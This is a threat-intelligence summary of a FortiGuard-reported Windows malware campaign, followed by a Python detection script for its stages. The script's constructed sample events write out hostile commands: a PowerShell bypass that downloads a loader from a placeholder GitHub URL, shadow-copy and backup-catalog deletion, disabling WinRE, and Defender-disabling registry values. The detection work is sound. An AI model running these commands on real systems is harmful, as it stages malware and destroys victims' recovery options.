Fortinet/FortiGuard researchers reported a multi-stage Windows malware campaign that relies on social engineering rather than exploiting a software vulnerability, using business-themed lures delivered in compressed archives. The initial file is a malicious .LNK shortcut crafted to look like a benign document; when opened it launches PowerShell with execution-policy bypasses to fetch a first-stage loader from cloud services (notably GitHub and Dropbox) while displaying decoy content to reduce user suspicion. Reporting indicates the chain includes staged scripts (e.g., obfuscated/encrypted VBScript reconstructed in memory) and “phone-home” signaling (including Telegram bot notifications) to confirm execution and continue payload delivery.
A key characteristic of the campaign is systematic defense evasion, including disabling or neutralizing Microsoft Defender and other Windows security controls and impairing recovery options, enabling follow-on actions such as data theft, remote access, and in some cases file encryption. Separate reporting in this set describes other, unrelated activity (FortiGate SSO bypass exploitation, a general weekly threat bulletin, Iran/Starlink connectivity issues, a watering-hole targeting EmEditor users, a China-linked espionage campaign targeting India, and generic “common threats” guidance) and does not materially change the technical picture of the FortiGuard-described Windows LNK/PowerShell multi-stage malware chain.

3 events from the most recent confirmed update back to the earliest known activity.
Once defenses were neutralized, the operation deployed multiple payloads including Amnesia RAT for credential and cryptocurrency-wallet theft, Hakuna Matata ransomware for file encryption, WinLocker for desktop lockout with Russian-language ransom notes, and a clipboard hijacker to redirect cryptocurrency payments. The attackers hosted components on GitHub and Dropbox to blend malicious traffic with legitimate services.
After execution, the malware coerced Windows into disabling Microsoft Defender by registering a fake antivirus product and making extensive registry changes to turn off monitoring, add exclusions, and restrict administrative tools. It also disabled the Windows Recovery Environment, deleted backup catalogs, and removed Volume Shadow Copies to hinder recovery.
FortiGuard Labs reported a malware campaign targeting Windows systems that relies on social engineering and abuse of legitimate Windows security mechanisms rather than software exploits. The campaign used business-themed documents in compressed archives with malicious shortcut files to launch PowerShell, fetch a first-stage loader from GitHub, and show decoy documents to victims.
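The three behaviours this summary attributes to the chain (a shortcut that launches PowerShell with an execution-policy bypass to fetch a loader from GitHub or Dropbox, registry changes that weaken Microsoft Defender, and removal of recovery options such as WinRE, the backup catalog and Volume Shadow Copies) are each visible in ordinary endpoint telemetry. The following detection pass is an added example written for this page; it is not code from FortiGuard, Mallory, or the report. It runs three rules over constructed Sysmon-style events (EventID 1 process creation, EventID 13 registry value set). The sample command lines, file paths and registry values are assumptions chosen to exercise the rules, since the report quoted here does not publish the exact commands or values the campaign used; the registry locations listed are documented Defender policy and preference keys.

```python
"""Detection pass for the three stages described in the FortiGuard summary.
Events, paths and values below are constructed samples, not report indicators."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str        # which of the three rules fired
    technique: str   # plain-language label for the behaviour
    evidence: str    # the field(s) that triggered the match


# Cloud hosts the summary names as loader staging locations.
CLOUD_HOSTS = re.compile(
    r"(github\.com|githubusercontent\.com|dropbox\.com|dropboxusercontent\.com)", re.I)
# Execution-policy bypass spellings PowerShell accepts (-ep/-exec are abbreviations).
EXEC_POLICY_BYPASS = re.compile(r"-(?:ExecutionPolicy|ep|exec)\s+(?:bypass|unrestricted)", re.I)

# Registry subtrees where a value change weakens Defender (policy keys, exclusions,
# real-time protection). Treat as a starting point: the report did not publish
# which values the campaign set, so these are assumed locations, not a signature.
DEFENDER_KEYS = (
    r"\SOFTWARE\Policies\Microsoft\Windows Defender",
    r"\SOFTWARE\Microsoft\Windows Defender\Exclusions",
    r"\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection",
)

# (executable, required argument keywords, label) for recovery impairment.
RECOVERY_IMPAIRMENT = (
    ("vssadmin.exe", ("delete", "shadows"), "Volume Shadow Copy deletion"),
    ("wmic.exe", ("shadowcopy", "delete"), "Volume Shadow Copy deletion"),
    ("wbadmin.exe", ("delete", "catalog"), "backup catalog deletion"),
    ("reagentc.exe", ("/disable",), "Windows Recovery Environment disabled"),
    ("bcdedit.exe", ("recoveryenabled", "no"), "boot recovery disabled"),
)


def _basename(path: str) -> str:
    """Last path component, splitting on backslashes regardless of host OS."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_lnk_powershell(ev: dict):
    """PowerShell spawned by explorer.exe (how a double-clicked .LNK appears) with an
    execution-policy bypass; a cloud staging host in the command line strengthens it."""
    if ev.get("EventID") != 1 or _basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    if _basename(ev.get("ParentImage", "")) != "explorer.exe":
        return None
    cmd = ev.get("CommandLine", "")
    if not EXEC_POLICY_BYPASS.search(cmd):
        return None
    host = CLOUD_HOSTS.search(cmd)
    evidence = "execution-policy bypass under explorer.exe"
    if host:
        evidence += f", fetch from {host.group(1)}"
    return Finding("lnk_powershell_bypass", "shortcut-launched PowerShell stager", evidence)


def rule_defender_tamper(ev: dict):
    """Any value written under a Defender policy/exclusion/real-time-protection key."""
    if ev.get("EventID") != 13:
        return None
    target = ev.get("TargetObject", "")
    if any(key.lower() in target.lower() for key in DEFENDER_KEYS):
        return Finding("defender_registry_tamper", "Defender configuration change",
                       f"{target} = {ev.get('Details', '')}")
    return None


def rule_recovery_impairment(ev: dict):
    """Built-in tools invoked with the arguments that remove recovery options."""
    if ev.get("EventID") != 1:
        return None
    image, cmd = _basename(ev.get("Image", "")), ev.get("CommandLine", "").lower()
    for exe, keywords, label in RECOVERY_IMPAIRMENT:
        if image == exe and all(k in cmd for k in keywords):
            return Finding("recovery_impairment", label, ev["CommandLine"])
    return None


RULES = (rule_lnk_powershell, rule_defender_tamper, rule_recovery_impairment)


def detect(events):
    """Apply every rule to every event; return all findings in event order."""
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


def triage(events):
    """The combination of stages on one host, not a single hit, is what separates
    this chain from routine admin activity (a lone vssadmin run is common)."""
    stages = sorted({f.rule for f in detect(events)})
    return {"stages": stages, "stage_count": len(stages), "escalate": len(stages) >= 2}


# Constructed sample telemetry: six malicious-looking events, then two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-WebRequest https://raw.githubusercontent.com/PLACEHOLDER/loader.ps1 -OutFile C:\Users\Public\l.ps1"'},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reagentc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "reagentc.exe /disable"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wbadmin.exe delete catalog -quiet"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": r"powershell.exe -File C:\Tools\backup.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe list shadows"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.technique}: {f.evidence}")
    print(triage(SAMPLE_EVENTS))
```

The fake antivirus registration the summary mentions is not covered by these rules: that shows up as a new AntiVirusProduct instance in the Security Center WMI namespace rather than as a process or registry event, so it needs a separate WMI or Security Center audit rather than Sysmon EventID 1/13 telemetry.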